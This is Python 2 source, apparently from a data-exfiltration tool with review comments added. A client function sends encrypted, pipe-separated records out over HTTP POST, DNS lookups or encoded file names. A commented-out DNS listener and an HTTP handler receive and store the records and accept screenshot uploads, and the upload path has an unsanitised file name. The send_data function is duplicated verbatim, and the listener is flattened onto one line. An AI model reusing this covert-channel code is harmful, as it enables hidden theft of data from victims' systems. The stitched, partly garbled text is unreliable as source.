def send_data(result, target, key, host, network_avail, dns_avail):
    """Send ``result`` out over the first channel that is flagged available.

    Python 2 code (``urllib2``). Channels are tried in this order and only
    one is used per call:

    * ``network_avail`` truthy: the whole ``result`` string is passed to
      ``translateMessage(..., 'encrypt')`` and POSTed as form field ``d``,
      with ``host`` as form field ``s``, to ``'http://' + target + url_end``.
    * ``dns_avail`` truthy: ``result`` is split on ``|``; in each piece every
      run of non-word characters becomes ``-`` and pieces longer than one
      character are handed to ``rec_split`` (defined elsewhere; presumably
      it emits the DNS lookups -- confirm against that function).
    * otherwise: for each piece an empty file is created whose name is the
      encrypted piece (opened in append mode and closed immediately).

    Every failure inside a channel is swallowed by a bare ``except``; the
    function always returns ``None``.

    Review notes for defenders reading this sample:

    * The URL is built with the literal ``http://`` scheme, so the form
      fields ``d`` and ``s`` travel without transport encryption and are
      visible to proxy and network inspection.
    * The file fallback leaves one zero-length file per piece. The path is
      whatever ``translateMessage`` returns, so it is relative to the
      working directory unless that text is itself a path -- confirm.

    Args:
        result: ``|``-separated text to send.
        target: host name the HTTP URL is built from; also passed to
            ``rec_split``.
        key: key handed to ``translateMessage``.
        host: identifier sent as form field ``s`` / passed to ``rec_split``.
        network_avail: truthy to use the HTTP channel.
        dns_avail: truthy to use the ``rec_split`` channel when HTTP is off.
    """
    if network_avail:
        form = urlencode({'d': translateMessage(result, key, 'encrypt'), 's': host})
        try:
            # urlopen() with a data argument already issues the POST.
            reply = urllib2.urlopen('http://' + target + url_end, form)
            # NOTE(review): `reply` is a response object; this call presumably
            # raises and is swallowed below, so one request per call reaches
            # the wire -- confirm.
            reply.request('POST', url_end, form)
        except:
            pass
        return

    use_dns = bool(dns_avail)
    for piece in result.split('|'):
        try:
            # Collapse every run of non-word characters to a single dash.
            label = re.sub(r"\W+", "-", piece)
            if not use_dns:
                # Create (or touch) an empty file named after the encrypted piece.
                open(translateMessage(label, key, 'encrypt'), 'a').close()
            elif len(label) > 1:
                # `subdomain` is read from module scope, not passed in.
                rec_split(label, key, host, target, subdomain)
        except:
            pass
def send_data(result, target, key, host, network_avail, dns_avail):
    """Send ``result`` out over the first channel that is flagged available.

    Python 2 code (``urllib2``). Channels are tried in this order and only
    one is used per call:

    * ``network_avail`` truthy: the whole ``result`` string is passed to
      ``translateMessage(..., 'encrypt')`` and POSTed as form field ``d``,
      with ``host`` as form field ``s``, to ``'http://' + target + url_end``.
    * ``dns_avail`` truthy: ``result`` is split on ``|``; in each piece every
      run of non-word characters becomes ``-`` and pieces longer than one
      character are handed to ``rec_split`` (defined elsewhere; presumably
      it emits the DNS lookups -- confirm against that function).
    * otherwise: for each piece an empty file is created whose name is the
      encrypted piece (opened in append mode and closed immediately).

    Every failure inside a channel is swallowed by a bare ``except``; the
    function always returns ``None``.

    Review notes for defenders reading this sample:

    * The URL is built with the literal ``http://`` scheme, so the form
      fields ``d`` and ``s`` travel without transport encryption and are
      visible to proxy and network inspection.
    * The file fallback leaves one zero-length file per piece. The path is
      whatever ``translateMessage`` returns, so it is relative to the
      working directory unless that text is itself a path -- confirm.

    Args:
        result: ``|``-separated text to send.
        target: host name the HTTP URL is built from; also passed to
            ``rec_split``.
        key: key handed to ``translateMessage``.
        host: identifier sent as form field ``s`` / passed to ``rec_split``.
        network_avail: truthy to use the HTTP channel.
        dns_avail: truthy to use the ``rec_split`` channel when HTTP is off.
    """
    if network_avail:
        form = urlencode({'d': translateMessage(result, key, 'encrypt'), 's': host})
        try:
            # urlopen() with a data argument already issues the POST.
            reply = urllib2.urlopen('http://' + target + url_end, form)
            # NOTE(review): `reply` is a response object; this call presumably
            # raises and is swallowed below, so one request per call reaches
            # the wire -- confirm.
            reply.request('POST', url_end, form)
        except:
            pass
        return

    use_dns = bool(dns_avail)
    for piece in result.split('|'):
        try:
            # Collapse every run of non-word characters to a single dash.
            label = re.sub(r"\W+", "-", piece)
            if not use_dns:
                # Create (or touch) an empty file named after the encrypted piece.
                open(translateMessage(label, key, 'encrypt'), 'a').close()
            elif len(label) > 1:
                # `subdomain` is read from module scope, not passed in.
                rec_split(label, key, host, target, subdomain)
        except:
            pass
#else: # udps.bind(('',53)) while 1: try: data, addr = udps.recvfrom(1024) p=DNSQuery(data) if p.domain.find(target) > -1 : udps.sendto(p.response(ip), addr) print 'Response: %s -> %s' % (p.domain, ip) fullinfo, domain = p.domain.split(target) print (fullinfo) fullinfo = fullinfo.replace("'","") info, session,temp, temp2 = fullinfo.split('.') decrypted = translateMessage(info,key,'decrypt') type, value = decrypted.split('-',1) print (type,value) type = type.upper() con = sqlite3.connect(dbfile) cur = con.cursor() try: cur.execute("INSERT INTO data (sessionid, type, value, requestdate, ip) VALUES(?,?,?,?,?)", (session,type.upper(),value,str(datetime.datetime.utcnow()), str(addr[0]))) con.commit() except sqlite3.IntegrityError: print("Ierr") if con: try: con.close() except:
def do_POST(self):
    """Handle a POST on one of two paths: text records or a file upload.

    NOTE(review): this listing had lost its indentation; the nesting below
    is a reconstruction and should be checked against the original file.
    Python 2 code (``urlparse``, ``iteritems``, ``SimpleHTTPServer``).

    Record branch (``self.path`` matches ``url_end``): reads
    ``Content-Length`` bytes, parses them as a form, decrypts field ``d``
    with ``translateMessage`` and splits it on ``|``. Each ``"<type> <value>"``
    record is inserted into table ``data`` of ``dbfile`` together with form
    field ``s`` (session id), a UTC timestamp and the client IP. The reply
    is produced by ``SimpleHTTPRequestHandler.do_GET`` after changing to
    ``work_dir``.

    Upload branch (``self.path`` matches ``url_screenshot_end``): expects
    ``multipart/form-data``, writes the first part to ``CWD`` under the
    file name supplied in the request unless that path already exists, and
    replies 404 whether or not a file was written.

    A request matching neither pattern returns without a response being
    sent from this method.
    """
    # NOTE(review): url_end + '*' is used as a regular expression. If url_end
    # is a plain path string, the '*' applies to its last character and
    # re.search matches anywhere in the path, so this is not an exact route.
    if None != re.search( url_end +'*', self.path):
        ip = self.client_address[0]
        # NOTE(review): the client-declared length is trusted with no upper
        # bound, and a missing or non-numeric header raises here, outside
        # any try block.
        length = int(self.headers['Content-Length'])
        post_data = urlparse.parse_qs(self.rfile.read(length).decode('utf-8'))
        session = ""
        info = ""
        # parse_qs maps each field name to a list of values; only the first
        # value of 'd' and 's' is used.
        for key1, value in post_data.iteritems():
            if key1 == 'd':
                #print(value)
                decrypted = translateMessage(value[0],key,'decrypt')
                info_array = decrypted.split('|')
            if key1 == 's':
                #print(value)
                session = value[0]
        # NOTE(review): info_array is bound only when a 'd' field was present;
        # a POST without it raises NameError on the next line.
        for info in info_array:
            type=''
            value2=''
            try:
                if len(info)>3:
                    type, value2 = info.split(' ',1)
                    regex = re.compile(r"\W+")
                    # Runs of non-word characters are reduced to '-' before
                    # the value is stored.
                    value = regex.sub("-",value2.strip())
                    print (type,value)
            except:
                # Malformed record: log the traceback and the raw record,
                # then move on to the next one.
                with open(logfile, "a") as myfile:
                    traceback.print_exc(file=myfile)
                    myfile.write("Info: " + info)
                traceback.print_exc()
                print("info: " + info)
                continue
            try:
                con = sqlite3.connect(dbfile)
            # NOTE(review): OperationalError is referenced unqualified here but
            # as sqlite3.IntegrityError below; unless the name is imported
            # elsewhere, reaching this clause raises NameError.
            except OperationalError:
                with open(logfile, "a") as myfile:
                    traceback.print_exc(file=myfile)
                # Single retry after one second; a second failure propagates.
                time.sleep(1)
                con = sqlite3.connect(dbfile)
            cur = con.cursor()
            try:
                # NOTE(review): for a record of 3 characters or fewer the
                # assignment to `value` above is skipped, so this test sees
                # the list left over from the form loop or the previous
                # record's text, and that stale value is inserted with an
                # empty type.
                if len(value)>0:
                    # Values are bound through '?' placeholders, so request
                    # data is not spliced into the SQL text.
                    cur.execute("INSERT INTO data (sessionid, type, value, requestdate, ip) VALUES(?,?,?,?,?)", (session,type.upper(),value,str(datetime.datetime.utcnow()), str(ip)))
            except sqlite3.IntegrityError:
                # Row rejected by a table constraint: drop it silently.
                con.close()
                continue
            con.commit()
            if con:
                con.close()
        try:
            os.chdir(work_dir)
        except:
            pass
        # The POST is answered with whatever the static GET handler serves
        # for self.path.
        return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
    if None != re.search(url_screenshot_end + '*', self.path):
        try:
            try:
                os.chdir(work_dir)
            except:
                pass
            #os.chdir('..')
            ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
            if ctype == 'multipart/form-data' :
                # using cgi.FieldStorage instead, see
                # http://stackoverflow.com/questions/1417918/time-out-error-while-creating-cgi-fieldstorage-object
                fs = cgi.FieldStorage( fp = self.rfile,
                    headers = self.headers, # headers_,
                    environ={ 'REQUEST_METHOD':'POST' }
                    # Everything else comes from the 'headers' object, but
                    # FieldStorage was designed for CGI: without 'POST' in
                    # environ it will not read from the 'fp' argument.
                )
                ## print 'have fs'
                #pprint(fs)
            else:
                raise Exception("Unexpected POST request")
            # Only the first multipart part is used, whatever its field name.
            fs_up = fs.list[0]
            # NOTE(review): fs_up.filename comes from the request and is joined
            # to CWD unchanged. A name with '..' components or an absolute
            # path resolves outside CWD (os.path.join drops CWD when the
            # second argument is absolute). Reduce it with os.path.basename
            # and confirm the resolved path stays under the upload directory
            # before opening it.
            fullname = os.path.join(CWD, fs_up.filename)
            try:
                # Existing files are never overwritten.
                if not os.path.exists(fullname):
                    with open(fullname, 'wb') as o:
                        # self.copyfile(fs['upfile'].file, o)
                        # NOTE(review): the whole part is read into memory
                        # with no size limit.
                        o.write( fs_up.file.read() )
            except:
                # Write failures are discarded; nothing is logged for them.
                pass
            # The reply is 404 whether or not the file was written.
            self.send_response(404)
            self.end_headers()
        except Exception as e:
            # Log to the log file and to stderr; the exception text is also
            # sent back to the client in the error page.
            with open(logfile, "a") as myfile:
                traceback.print_exc(file=myfile)
            traceback.print_exc()
            self.send_error(404,'POST to "%s" failed: %s' % (self.path, str(e)) )